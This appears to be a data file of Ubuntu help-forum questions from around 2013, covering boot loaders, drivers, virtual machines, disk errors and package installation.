272831	efi stub loader for ubuntu 12.10/windows 8 using refind on surface pro	i 'm trying to do a dual boot of windows 8 and ubuntu 12.10 on my surface pro and would like to use refind for my boot manager . i do not want to ever install grub , including during installation of ubuntu , since my past experience with attempting to do that on this device has led to corruption of the windows boot loader , which can effectively brick the device since it seems to need these to boot from usb . i 'm aware of the success of dual boot surface pro with ubuntu ? , but want to stay away from grub completely . so far i have tried the following : install and test that refind is working for just windows 8 with no issues install ubuntu 12.10 from `` ubiquity -b '' to prevent grub from being installed verify i can still properly boot into windows 8 unfortunately this does n't seem to generate any .efi stubs for ubuntu , so i 'm not sure what to do at this point . what can i do to generate these without installing grub or any other boot loader ? keep in mind that at this stage i ca n't actually boot directly into ubuntu , only a live installation , unless there is something else i should be doing during the actual installation . to reiterate , what i want to do is : install ubuntu without grub , generate efi stubs for ubuntu , never touch the efi firmware or the windows boot directory , and then rely on refind to find these stubs during bootup .
272833	question about installing ubuntu 12.10 on laptop	i have a lenovo y580 laptop with a 1tb hard drive and a ssd installed on the msata . so apparently lenovo did something weird with the hard drive : there are already 4 partitions on the hard drive , and for some reason the ubuntu install disk can not detect my windows installation . i did some reading , and there seems to be additional problems with rapiddrive caching the ssd with the hard drive . i do not have the option of installing ubuntu with my windows installation . i do not want to lose my data and my work on my windows partition , so i decided that i am going to remove the hard drive and swap it with a spare hard drive that i have hanging around to do a fresh installation of ubuntu on the entire disk . my questions : should i remove the ssd in the msata slot as well as the original hard drive ? will i potentially break my ssd ? edit i decided to remove the ssd just in case . if i install ubuntu on the spare hard drive , can i then remove it , put it in a usb drive enclosure , and put the original drive back in , then boot from the external hard drive ? would i have to install a boot loader on the original drive , or will the drive be able to boot from usb ? thank you .
272835	install same packages from one server on another	i have a legacy ubuntu server 12.04 ( i386 ) and a new ubuntu server 12.04 lts ( amd64 ) how do i use the same list of packages from the legacy server on the amd64 server ? i tried this : dpkg -- get-selections > installedpackages but when i use that list on the new server it tries installing i386 libraries and binaries . i do n't want that . i only want the amd64 stuff . i used this post as a guide how to list all installed packages ? any help is appreciated .
272836	why no maas-cli for 12.04 lts ?	the documentation for maas describes how to do all sorts of things with maas-cli , but maas-cli does n't seem to be available for 12.04.2 lts . is there an lts release of ubuntu where i can use maas in the way it 's described in the documentation ?
272842	no login screen on ubuntu 12.10 after update	a few weeks back , i applied the latest updates to my ubuntu 12.10 ( 32-bit ) running gnome-shell , which happens to be a virtual machine running under vmware player 5.0 on windows 7 . after the updates and a subsequent reboot , i did n't get the login screen . i could ctrl-alt f1 to a text console , and i tried booting from the previous kernel , but no luck . i discovered that if i disabled 3d acceleration in the vm settings , then the login screen would appear just fine . however , this is n't acceptable since the screen updates are just too slow . i did a fresh install and after updating the same problem occurred . the same problem does not happen on 12.04 lts . not yet anyway . i wrote a blog post describing the problem , and luckily someone left a comment that , although did n't directly fix my problem , helped me come up with a fix . here 's a link to my post : http : //www.itadmintools.com/2013/03/gnome-shell-just-broke-on-ubuntu-1210.html the problem appears to be a bug in the 9.0.2 version of the mesa 3d drivers . 9.0.3 fixes the problem , and they are located in the proposed repository . p.s . i would have written this in the existing question ( ubuntu 12.10 no login screen after update ( vmware workstation 9 ) ) but it was locked and i do n't have the rating to unlock it .
272843	are there any ways to make a key on the keyboard act as 2 keys ?	i have the `` rightclick '' ( menu ) button on my keyboard , which is completely useless . i want to remap the keyboard such that whenever i press this button , it simulates an `` up arrow '' then after 0.1 second a `` down arrow '' . in my everyday usage i need to press my up then down arrows repeatedly and i want to simplify this process . is this in anyways possible ?
272848	how do i create a raid5 at installation of ubuntu 12.10 ?	for the life of me i can not find the way to create a raid 5 set while doing a clean install of ubuntu 12.10 . it appears the `` alternate '' installation disk either does n't exist or i am looking in the wrong place . that was the way i have done this on older versions of ubuntu . i can do an isntallation of 12.04 and upgrade to 12.10 , but that seems so unclean and defeats the purpose of the clean installation . these are new disks ( 5 x 1 tb ) so data preservation is not an issue . any help on doing this cleanly would be greatly appreciated .
272857	flash keeps crashing , possibly sound problem	flash crashes constantly , regardless of whether or not i use firefox , chrome , or chromium . it does not always crash , but i would estimate it crashes 4 out of 5 times when loading a page . it seems to be most likely to happen on pages that have more than one flash item . it also happens when flash has to make a transition of some sort . for example , when youtube switches from an advertisement to the main video , then it might crash . also , some sites are more likely to crash than others . vimeo will crash with almost 100 % reliability . youtube is fairly stable , and crashes maybe one out of five times . i have tried uninstalling and reinstalling flash . i have tried the flash-aid plugin , but none of the options it presented helped ( in fact , it always ended up simply removing flash and not finding an installation candidate ) . i think it might have something to do with how flash is connecting to pulse . part of the reason i suspect sound is a problem is that i had to get help to get flash to work with my sound before . as far as i understand it , all that 's different about my sound system is that i go over a network to connect to a pulse sound server on a different machine , and that i 've hardcoded the server ip and port by adding a line that says pulse_server=192.168.0.4:4713 in the file /etc/environment on the client machine . that 's basically it , i think , but for more specifics , there are details here . unfortunately , it seems that flash does n't like this set up . it 's maddening to have flash be so unstable , so i hope someone can advise on how i might diagnose and solve this problem .
272862	how to add a synclient command to rc.local ?	if i just put synclient string=value in rc.local it does n't work . do i need an echo to someplace or is rc.local not the place to do this ?
272863	touchpad disabled for ubuntu 12.04 , how to reenable ?	not able to use touchpad . xinput list detects the touchpad , but system settings does n't list it . it used to list both mouse and touchpad , unfortunately it now only lists mouse which is very weird . also i 've tried the following code xinput set-prop 13 `` device enabled '' 1 to enable it . unfortunately that too does n't work .
272867	identify `` rogue '' internet accessing applications	at the moment i have an application/service/widget/plugin/cronjob whatever , accessing the internet on a regular basis . i could go into the details of my specific issue but i 'd rather have an answer that will allow me to fault find it my self and in the process learn more about ubuntu . i 'm using dnstop at the moment to display all of the dns requests that are being made on my network . currently for arguments sake , there is a request going to weather.noaa.gov on a 15 minute cycle . it 's probably a weather widgit although i have checked my processes and found nothing , and the request is comming from my computer . so the question , how do i determine what process is accessing weather.noaa.gov ? i do n't want to go through a process of ellimination by shutting down each service/plugin/application to figure this out . i would like to find a way to determine what process is making that dns request . if i had a decent `` application firewall '' the request would have never been made . but this is a `` horse has already bolted '' scenario and would like to find that `` rogue '' process that is making that dns request .
272869	removing folder shortcuts from gnome-panel	i am using 12.10 , gnome classic desktop . i believe the top bar ( applications/places menus ; wireless icon , sound volume icon , clock , bluetooth icon , etc . ) comes from gnome-panel , but i am not sure . anyway , i accidentally dragged a folder onto it and now it displays a nice icon proving shortcut access to the folder . i 'd like to remove this icon but i ca n't seem to be able to `` drag it out of there '' .
272871	how do you ignite tnt in version v0.6.1alpha	i ca n't egnite tnt in the version v0.6.1 alpha i need help i do n't know what to do i tried todo many things but i just ca n't get it
272873	what is the maximum amount of ram that ubuntu 32 bit supports ?	intel xeon e5-1620 oced to 4.75ghz asus p9x79 pro 8gb 1333 7-7-7-20 ( thinking about 24gb ) i am considering to install ubuntu . will the 32bit version support more ram than 4gb ?
272874	wifi not working on macbook pro running 12.10	i 've seen many other posts like this and found one other where the problem was resolved , but the terminal commands given were for a different pcid than mine . i ran several commands including : sudo apt-get install linux-headers-generic which got the response : linux-headers-generic is already the newest version . i also ran : sudo apt-get install -- reinstall bmcwl-kernel-source which got the error message : e : unable to locate package bmcwl-kernel-source i am new to linux , but this seems to be a pretty common issue with 12.10 . my pcid is 14e4:4331 if anyone could help , i would really appreciate it .
272875	can i make my qt gui programs run after completely removing unity desktop ?	can i make my qt gui programs run after completely removing unity desktop ? i am building a desktop environment on qt . how can i run my program without unity .
272877	ubuntu does not run after installation	i tried installing ubuntu on a new lenovo g480 . i downloaded the .iso file and burned cd to install . the computer had no os pre-installed , i used the cd installer to install ubuntu 12.04 . after installation , when i turn on the computer , ubuntu does not start up . i have no idea what could be wrong .
272881	how to install vbox guest additions in ubuntu 12.10	unable to install vbox guest additions in ubuntu . it shows some problem woth linux header . ps : i am using ubuntu 12.10 guest on windows8 host . when i tried installing it i got following : - verifying archive integrity ... all good . uncompressing virtualbox 4.2.10 guest additions for linux ... ... ... . virtualbox guest additions installer removing installed version 4.2.10 of virtualbox guest additions ... removing existing virtualbox non-dkms kernel modules ... done . building the virtualbox guest additions kernel modules the headers for the current running kernel were not found . if the following module compilation fails then this could be the reason . building the main guest additions module ... fail ! ( look at /var/log/vboxadd-install.log to find out what went wrong ) doing non-kernel setup of the guest additions ... done . installing the window system drivers installing x.org server 1.13 modules ... done . setting up the window system to use the guest additions ... done . you may need to restart the hal service and the window system ( or just restart the guest system ) to enable the guest additions . installing graphics libraries and desktop services components ... done . press return to close this window ...
272883	terminator terminal resize	i set up the terminator terminal to the quake drop down mode ; however , the terminal is only 90x25 . i would like for it drop down the whole width of the screen but not full screen . when the terminal is n't in the drop down mode , i can resize it manually but it wo n't let me do that now . how can i accomplish this task ?
272885	grub corrupted and etc directory missing	i have a dual installation with ubuntu 10.04 and windows 7 . i was in windows , i had to restart my machine and my grub was not loading . i used boot-repair to load my grub . however , my linux installation had a file system corrupt due to some not safe restart . so i was trying to do fsck from live cd . however , after the the check says everything is fine , when i mounted the partition , my etc directory in my linux partition root directory has become a file . further , this lead to my grub not getting loaded and bunch of failures after that as /etc is important to purge and reinstall a grub . can someone help me how to fix this ?
272887	what does `` seperate x screen '' mean on my nvidia settings ?	i have 2 video cards and 3 monitors . earlier today , i connected my 3rd monitor . nothing displayed on it and my other 2 screens worked great . while tweaking , i modified my geforce 8400gs so the `` configuration '' was set to `` seperate x screen '' which was the only option available . now when i hook up the 3rd monitor i see this ( ignore the laptop on the right ) : the 2 screens show an nvidia logo while the 3rd screen continues to be black . can someone explain what is going on here ?
272895	loading the operating system to the usb drive for mac	execute sudo dd if=/path/to/downloaded.img of=/dev/rdiskn bs=1m ( replace /path/to/downloaded.img with the path where the image file is located ; for example , ./ubuntu.imgor ./ubuntu.dmg ) . what does this mean example : in terminal i would type sudo dd if=/users/me/desktop/ubuntu.img of/dev/rdisk3 bs=1m/users/me/desktop/ubuntu.img is this correct or would n't be something different i do n't understand the terminology
272896	fsck on ext4 resulted in file corruption	i had to hard reboot my machine and i had a file system corruption . i have tried to run fsck on the partition from live cd . however my partition is ext4 and i understand that fsck defaults to ext2 which happened in my case of an old boot-repair disk . now my file system is further corrupted . how to fix this problem and recover my ubuntu 10.04 back ?
272900	how to drag full screen window to the other workspace in unity	as the title i can drag the window to the other workspace if the window is not full screen . i need restore the window first before i move it to the other workspace . any shortcut ?
272903	i am owner of a folder but can not access it	i have a folder with my notes about the system inside . i am logged in as user1 cd masternotes produces : bash : cd : mastersnotes : permission denied whoami produces : user1 ls -l produces : drw-rw-rw- . 2 user1 user1 4096 mar 26 20:47 masternotes ls -l inside the directory produces : -rw-rw-rw- . 7 user1 user1 345 oct 7 2006 crontab -rw-rw-rw- . 7 user1 user1 348 oct 7 2006 crontab~ -rw-rw-rw- . 7 user1 user1 3702 oct 7 2006 grep_usage.txt -rw-rw-rw- . 7 user1 user1 91868 oct 7 2006 lvm-layout-10-14-03.tif -rw-rw-rw- . 7 user1 user1 30 oct 7 2006 mysql -rw-rw-rw- . 7 user1 user1 35764 oct 7 2006 notes i have run chmod -r 666 masternotes on the folder . i have run chown to root and chgrp to root and back again to user1 . root can descend and enter the folder and open the file . user1 can not . any clues as to what is going on here ?
272905	when trying to install ubuntu 12.10 onto a windows 7 pro host system using virtual pc , i get an error and can not continue	the error is : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropiate for your cpu . the thing is i have an intel core i5 3570k cpu , host system is 64-bit windows 7 pro , service pack 1 . i am installing from my dvd drive . again why the error ?
272910	ubuntu mobile os for my nokia c7	i have a nokia c7 and would love to use ubuntu mobile os . is there any plans of releasing for nokia c7 phones as well ? i guess the hardware is same as any standard touch phone ...
272919	is there a script that runs as root when user logs in ?	when a user logs in i need to execute a command that needs escalated privileges . i do n't want to give the user sudo access for that command . i just want to run this script for that user , not for all users .
272925	using 12.04 lts , update manager offers 12.10 but not 12.04.2	i 'm running 12.04 lts under virtualbox for mac , and i 'm not getting an option for any upgrade to 12.04.2 in update manager . in settings , `` notify me of a new ubuntu version : '' is set to `` for long-term support versions '' . when i set it to `` for any new version '' , i 'm notified of 12.10 . but can not get it to offer 12.04.2 at all . lsb_release -a in terminal results in : distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise the various terminal update options do n't help either .
272931	ubuntu brightness issue	i used to set the brightness in low level and ma icons size to small . but whenever i reboot , it set the default brightness and icons size . icon size i managee but i have to set the brightness to low everytime .
272933	is it possible to configure openvpn in ubuntu according configuration files relevant to windows ?	i am using openvpn in windows and have the configuration files as well . unfortunately the service provider does n't have any guide or configuration files for linux users . is it possible to use windows configuration files to configure openvpn certification in ubuntu ? the configuration files type for windows is `` visz '' .
272937	serious installation problem	i use ubuntu 12.04 lts . it was all well . but suddenly from yesterday whenever i try to install something it shows : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_gwibber-daily_ppa_ubuntu_dists_precise_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . and when i try to run synaptic package manager it shows : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_gwibber-daily_ppa_ubuntu_dists_precise_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . ' now , i could n't understand what is the problem ; what should i do ?
272946	how to change the username and computer name ?	i clone my no.1 os in vmware , the username and computer name are node1 , now i clone it and want to make the cloned one 's username and computer name became node2 . how can i do ?
272948	write a footnote per page	i need to write a footnote per page in my document ( not a footer which is the same throughout document ) . how do i do that ? note that some page have no footnote ( s )
272949	download executables on ubuntu	i 'm ( kind of ) new on ubuntu and i 'm having a heck of a time figuring out how to download executables . for example , i tried to download eclipse and a java environment this morning . on my windows xp pc , this would have worked fine , i would have double clicked on the download and the executable would have opened . however , on ubuntu , when i do that i get a .tar folder and , even by extracting it , i do n't see where it gets me . could anyone help ? thanks a lot !
272951	how to convert pdf to chm files ?	i 'm looking for some good tools in the ubuntu platform which does convert the pdf to chm files . i googled a lot . but i almost finding the tools for other way around ( i.e chm to pdf ) .
272952	not able to access windows partition	whenever i am clicking on windows drive i am getting this error as in screenshot here : what can i do to fix this ?
272953	can not install ubuntu 12.10 when i select boot device	i have created a bootable ubuntu by using universal usb installer ( downloaded from ubuntu official site ) . when i select boot device ( my pen drive ) from boot menu as usual the ubuntu has appear , after selecting language it gives me four option try on usb , install ubuntu and another two options i forget it whatever when i select `` install ubuntu '' my computer restart and can not load from usb . i have tried other three options but same result . i am using windows 8 , ram 6gb . anybody can help me please ? is there another way to install ubuntu 12.10 ?
272955	problem with gimp , it does n't show correct image as in compair with photoshop !	i have gimp 2.8.2 on my ubuntu 12.10 machine . graphic designer claims psd file is like this : however , when i open it with my gimp , its like this : i have no idea what is the problem . any advice/comment would be appreciated . thanks
272956	how do i change to the desktop/layout like in the picture ?	i would love to change my desktop to the one below : could someone please help ?
272957	how to copy a subset of files from a certain folder	i have the following directory structure . dira/ [ filea , someb , barc , filed , somee , barf ] dirb/ [ filea , barc , somee ] i want to copy only files from dira to dirb which are already present in dirb . how do i do this selective copy ?
272958	will ubuntu 12.10 run with hardware acceleration on zotac zbox hd-id34 nvidia ion ?	i 'm contemplating buying this mini-pc zotac zbox hd-id34 i 've read in some posts of issues with earlier releases of ubuntu and wanted to makes sure that those issues have been resolved before i make a purchase i 'll regret . so my question is ; will this device run 12.10 and the coming 13.04 with hardware acceleration at install without much work needed ?
272965	how to list gnome-control-center panel names ?	there 's an ( as far as i can tell ) undocumented feature of gnome-control-center which can be used to show a specific panel directly . for example , gnome-control-center sound will display the `` sound '' panel . i 've been trying to figure out what the `` keyboard layout '' panel is called , without success : gnome-control-center keyboard # just the `` typing '' and `` shortcuts '' tabs gnome-control-center layout # not found gnome-control-center keyboardlayout # not found gnome-control-center 'keyboard layout ' # not found where can i find the list of panel names to use with this command ?
272972	how to roll up windows with mouse wheel with unity-2d	how can i roll up windows by mouse wheel up on title bar ? this solution for ubuntu 11.10 does not work : gconftool-2 -s -t string /apps/gwd/mouse_wheel_action shade i am on ubuntu 12.04 with unity-2d . thanks .
272980	can i get an @ ubuntu.com email address for the ubuntu-related event i 'm organising ?	i 'm currently organising an unconference that will have a significant part of it 's schedule given over to the ways in which people can contribute to ubuntu , along with some workshops on topics like packaging , iso testing and app development . this event has run for several years now and we imagine it running for many more , and i was wondering if it would be possible to get < myevent > @ ubuntu.com as an email address for it .
272985	update followed by `` broken pipe '' , read-only disks , and error	yesterday night i did an apt-get update and installed some updates ( unfortunately i did n't really pay attention to what i 've installed ) . this morning when i switch the laptop on , it could n't boot and a message of this sort appeared : could not write bytes : broken pipes i went on recovery mode , and i first tried to make free space . did not work . then i tried to run dpkg , but the filesystem state was on read-only state . so i changed the state , ran dpkg , not really sure of the outcome . nothing happened initially , but later i resumed and it finally booted ( but incredibly slowly ) . i ran smartcontrol and got this : === start of information section === model family : hitachi travelstar 5k500.b device model : hitachi hts545050b9a300 serial number : 101218pbn403x7dg2g2l lu wwn device id : 5 000cca 67cd47de9 firmware version : pb4oc66g user capacity : 500,107,862,016 bytes [ 500 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : ata-8-acs revision 6 local time is : wed mar 27 08:04:59 2013 gmt smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 119 ) the previous self-test completed having the read element of the test failed . total time to complete offline data collection : ( 645 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 158 ) minutes . sct capabilities : ( 0x003d ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000b 100 100 062 pre-fail always - 65536 2 throughput_performance 0x0005 100 100 040 pre-fail offline - 0 3 spin_up_time 0x0007 154 154 033 pre-fail always - 1 4 start_stop_count 0x0012 098 098 000 old_age always - 4022 5 reallocated_sector_ct 0x0033 100 100 005 pre-fail always - 0 7 seek_error_rate 0x000b 100 100 067 pre-fail always - 0 8 seek_time_performance 0x0005 100 100 040 pre-fail offline - 0 9 power_on_hours 0x0012 083 083 000 old_age always - 7605 10 spin_retry_count 0x0013 100 100 060 pre-fail always - 0 12 power_cycle_count 0x0032 099 099 000 old_age always - 3080 191 g-sense_error_rate 0x000a 100 100 000 old_age always - 0 192 power-off_retract_count 0x0032 099 099 000 old_age always - 266 193 load_cycle_count 0x0012 090 090 000 old_age always - 108285 194 temperature_celsius 0x0002 127 127 000 old_age always - 43 ( min/max 1/58 ) 196 reallocated_event_count 0x0032 100 100 000 old_age always - 0 197 current_pending_sector 0x0022 100 100 000 old_age always - 9 198 offline_uncorrectable 0x0008 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x000a 200 200 000 old_age always - 0 223 load_retry_count 0x000a 100 100 000 old_age always - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed : read failure 70 % 7605 438875110 # 2 short offline completed without error 00 % 7139 - # 3 short offline completed without error 00 % 5584 - # 4 extended offline completed without error 00 % 878 - # 5 short offline completed without error 00 % 541 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . in addition , sometimes when i restart the laptop , it appears [ 354.899490 ] end request : i/0 error , dev sda , sector 463582321 then i log in , but the graphic is a joke and it 's just too slow . any help ?
272986	grub does n't recognize windows after ubuntu 12.10 installation	i 've got a problem : after installing ubuntu 12.10 grub does n't recognize windows 7 and i only can boot ubuntu . i wrote the windows entry into the grub config , but it did n't start also . i do n't know if it is a problem by the partitions or by grub itself . does anyone have had the same issue or has heard about it ? thanks very much in advance .
272992	upgrade from 11.04 to 11.10 has hung	i am currently running an upgrade from ubuntu 11.04 to 11.10 and the system has hung at : installing new version of config file /etc/mysql/debian-start ... it says there are about 4 minutes remaining . please direct me on what to do next . my knowledge of ubuntu at a technical level is sparse but i can work my way through instructions and command line stuff . i 'm not touching the process until i get some advice .
272997	sources.list & sources.list.d in /etc/apt	i could find that there is a sources.list file as well as a sources.list.d directory in the /etc/apt directory . if i am not wrong , both are used to set up the deb files for the packages we need to include . then what is the difference between the two ?
272998	how to find the boot option to select os ?	i am facing some problems after installing ubuntu . my computer wants to reboot after installing ubuntu , but after i restart it , windows 8 boots automatically . i can not find any boot option to select operating system , it just boots my windows 8 . i can not see the drive where i have installed ubuntu . how can i fix this ?
273000	which download manager is capable of 'throttle ' and 'pause & resume ' a running instance of download from a script	when downloading big files it necessary to pause the download many times . a big file can be downloaded by using wget . first start download , then kill wget , then resume download by wget -c. i want to pause downloads too many times depending on events such as power failure , network unavailability , etc ... and want to automate it using a script . so pressing ctrl+c is't an option . i know a process can be paused by kill -stop `` $ pid '' the pausing should not close the connection to the website , either it should wait for resume command or the bandwidth throttled to very low data useage . how to pause aria2 download is a partial solution but option pause is not supported in my aria2 ( 1.8.0 , ubuntu 10.04 lts ) and i ca n't upgrade aria2 ( from apt-get install or manually install ) . this rpc option for aria2 seems to works from ubuntu 11.10 . so a portable version of aria2 is also considerable . looking for i 'm looking for a download manager which is capable of throttle bandwidth and pause/resume all ( or one ) the running instance of download upon execution of a -- throttle=10k , -- pasue switch or something like that , and resume it on a -- resume switch ( or using other ways such as rpc ) . i know killall -9 $ ( pidof downloader ) should stop all downloads and can be resumed from the last point . but this only a bad choice for me as the number pause/resume is too high and the time to make connection to the server ( where download file locate ) is a wastage of time and bandwidth . aria1 can do some job by -- stop switch . but it 's obsolete and solves it partially .
273005	fullscreen virtualbox : ubuntu version of virtualbox-ose-guest-x11 fails to install on 12.04.02	i tried to get virtualbox to run an ubuntu 12.04.02 64-bit on fullscreen in my windows 7 host machine , and read that i require a virtualbox-ose-guest-x11 for it . when i try to install it on the guest ubuntu machine , it fails with a dependencies error .
273013	how to install new tmux 1.8 on ubuntu 12.10 or 12.04 ?	are there any ppa ? if no , how to make it from sources ? which dev libs i 'll need to do this ?
273014	photoshop on wine 1.4	i 've encountered a problem that seems it did n't happen to anyone other than me : s i 've downloaded ps cs6 and installed it with no problems , when i try to launch it via wine 1.4 it freezes on `` scannin for plugins '' : s ps.. i did add atmlib.dll and msvcr80.dll to the system32 folder and usin 12.04 lts : ) is there a solution : ?
273021	gcc 4.8 / mingw w64 4.8	there is a ppa where i can find these packages for 12.04 ? also a build script will do the job ! i 've tried to download it from sources but the dependencies are a mess . i 'd like to start porting my projects to c++-11 but do n't want to waste too much time installing from sources stuff ... gcc 4.8 will be included in 13.04 ? if so i could wait a pair of months : ) i 've tried to install it as specified by this question : how to install gcc-4.8 in ubuntu 12.04 from the terminal : sudo add-apt-repository ppa : ubuntu-toolchain-r/test [ ok ] sudo apt-get update [ ok ] gabry @ nevada : ~ $ sudo apt-get install gcc-4.8 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gcc-4.8 it seems that there is no version for 12.04 ... actually i 'm trying to build from sources , i 've had luck with the native compiler but i 'm going crazy to build a mingw32 w64 with std : :thread support ...
273024	does high definition videos play smoothly on samsung n150 plus ?	i have a samsung n-150 plus net-book , and i have always had difficulties in watching movies on it . i thought it 's due to windows 7 starter , so i changed my os to windows xp . although its been running quite smoother after then , but in high definition movies it plays them like slow motion and sometimes the movie 's sound and display are not matched together . i read in yahoo answer that ubuntu may help me in this field , and i came here to ask you if its helpful to install ubuntu on my net-book ?
273025	romanian special characters : the default ( comma , standard ) version looks bad in libreoffice , the cedilla versions are reported as incorrect	there are certain romanian characters ( ș , î , ț , ă , â ) which are handled differently in the different key layouts . the standard layout makes them look odd , different from the other letters in libreoffice ( and also in msofficexp ) . in msoffice 2007 they look the same ( that is : all look fine ) . in fact these characters are differently constructed in the different layouts , although msoffice 2007 seems to avoid displaying the difference . ( which also has the good effect that its spell-checker has no problems with them ; while in libreoffice the use of these characters with winkeys ( and other layouts that display the characters properly ) is reported as error ( as seen in the image ) ; on the other hand , in msofficexp the spell-checker reports as error any use of these characters with ro-std layout ) the problem is that the characters look bad in libreoffice , as seen in the image . they look like they used a different font than the letters of the same word . can this be helped ? in my keyboard layouts handler ( in xfce ) i see 4 possible choices my problem is related to the way this characters have been implemented in the `` standard '' version of the romanian layout . the wikipedia page says that there was a problem with these characters in windows before vista and was solved in later mswin versions . what i am dealing here with is a problem with these characters in the layout that is called the `` primary '' one on the wikipedia and `` standard '' in my panel list . the `` secondary '' version ( which is `` used as the default one by the majority of gnu/linux distributions '' , says wikipedia ) is called `` cedilla '' in my keyboard layouts options ; it avoids this problem reported here , but just like winkeys , is not accepted by libreoffice spell check : any special character is seen as error ; also , this is a version for programmers : it is like the us english layout , and the special characters are accessed in a way that would not change the usual use for programming ( which is english ) ; that is : they are too hidden and hard to get for people that would really use romanian to write , for these special characters are very often used . as it is said here , the idea is not to change the layout too often for people that rarely use these characters . it looks like so the winkeys layout looks like the `` standard '' ( primary ) , except that the characters 'y ' and 'z ' switch positions , and some non-letter characters , like quotation marks , have different keys . the ”standard cedilla” layout is identical with ”standard” , and it avoids the problem reported here by entering characters that , while looking good , are rejected by the libreoffice spell checker . summing up -- the question could be reformulated like so : the only romanian keyboard layout accepted by the spell check ( in libreoffice , but also in firefox and so on ) , the ”standard” , has special characters that does not look as they should , while the spell checker rejects precisely the characters that look good..
273026	mbr lost after shrinking active partition	i 've got a serious issue with mbr . initially got windows 7 up on my machine . i shrinked the active partition to create space for installing ubuntu . i formatted the new available space . now i simply can not boot to my windows 7 . so , plugged into ubuntu live usb drive , tried to access partitions and it says : unable to mount system : adding read acl for uid 999 to `/media/ubuntu ' failed : operation not supported did n't loose hope , so tried boot-repair , now simply stuck at freedos screen at bootup please find boot info below : http : //paste.ubuntu.com/5652026/ any help much appreciated ! thanks ...
273029	problem after installation ... `` minimal bash like line editing is supported . [ ... ] ''	i installed and then when i go to restart the computer , click on ubuntu and then we show this : minimal bash like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . and i click tab and show this : possible commads are : [ authenticate badram boot break clear configfile continue cutmem echo export extract_entries_configfile extract_entries source gettext initrd insmod linux loopback is menuentry normal normal_exit probe return search search.file search.fs_label search.fs_uuid set setparams shift source submenu terminal_input terminal_output test unset . what now ? ? ?
273034	lauching sublime text from command line	after follow this tutorial , i can not lauch sublime text from command line ... how can i fix this ?
273035	video-/podcasting setup on ubuntu	a few friends and i are gearing up to do a video- & podcast , and i was wondering if anyone had tips as to what software to use ... i run 12.04 and am responsible for recording , editing and publishing the thing . we have our website , powered by wordpress , so my question is really about the production part . i 'm looking at audacity for the audio and pitivi for the video ... and my basic idea is to do it through g+ as a hangout and record it . however if there is a cross-platform solution we could use i 'm open to suggestions .
273036	dell vostro 1015 wifi problem	ubuntu joined the family today , on my own computer not connecting to the internet today , wifi setup yapt覺m.dell vostro 1015 , builds vessels know how this problem .
273038	what are the differences between lubuntu , kubuntu , and ubuntu ?	are lubuntu , kubuntu , and ubuntu the same except for the desktop environment and a few programs ?
273044	how to deactivate grub after fresh installation ?	short version i have a system with windows 8 and in a working but undocumented state and next to it an ubuntu 12.10 with the grub2 bootloader , which does n't recognize windows correctly . i want to deactivate grub completely , because if i exit from grub i automatically get to a bootloader which can load ubuntu and windows both without problems . how can i deactivate grub completely ? what consequences do i face with that decision ? long version i installed ubuntu 12.10 64bit next to my oem windows 8 onto my freshly bought lenovo thinkpad e530 . coming with the installation the grub2 bootloader starts after activating the machine . the problem is that grub2 does n't seem to find the right starting point for the menu point `` start windows 8 '' by itself . it points to another partition but if i choose it , nothing happens . all that is complicated by an undocumented preconfiguration of the system with 2 other bootloaders already preinstalled . one seems to be a windows bootloader and another one seems to be a lenovo bootloader . maybe both are the same . this is unclear to me . now the only option i have at the moment to start windows after installing ubuntu 12.10 is to click c in grub2 , which brings me to the grub command line , followed by exit which as i assume closes the grub completely . closing grub did n't lead to the expected blackscreen or notion that there is nothing to boot , but it led to the lenovo bootloader in which i can freely choose between ubuntu ( which boots ubuntu directly , not grub again ) , windows ( which boots windows as desired ) and other options i did n't read yet . it seems that all the problems would go away with deactivating grub . so if there are not hard consequences with that i 'd like to shut it down that the other bootloader , whatever that might be , gets started automatically .
273045	how to use xbacklight with brightness keys in a vaio	i have a sony vaio vpccw15fl , with ubuntu 12.04 installed . sadly , the brightness keys do not work out of the box , although the brightness meter reacts to the brightness up/down keypresses . yesterday , i installed xbacklight and tried it from the terminal . as a normal user ( without sudo ) , i can run xbacklight -40 , for example , and the backlight dims . it works great . i then opened the keyboard settings , and tried to set up two custom shortcuts for controlling the backlight brightness . i named one as `` brightness up '' , with xbacklight +10 as its command . then i clicked to set the key , and `` monitor brightness up '' showed up ( as the key ) , so it was detected . however , even after rebooting , it did n't work . i tried changing the command to /usr/bin/xbacklight +10 but it did n't work either . what 's wrong with this ? also , i would like to know if i can make the brightness meter use the xbacklight command instead of its default . is there any file i can change to do this ? i think that would be even better than defining the shortcuts since it would integrate with the brightness bar . thanks : )
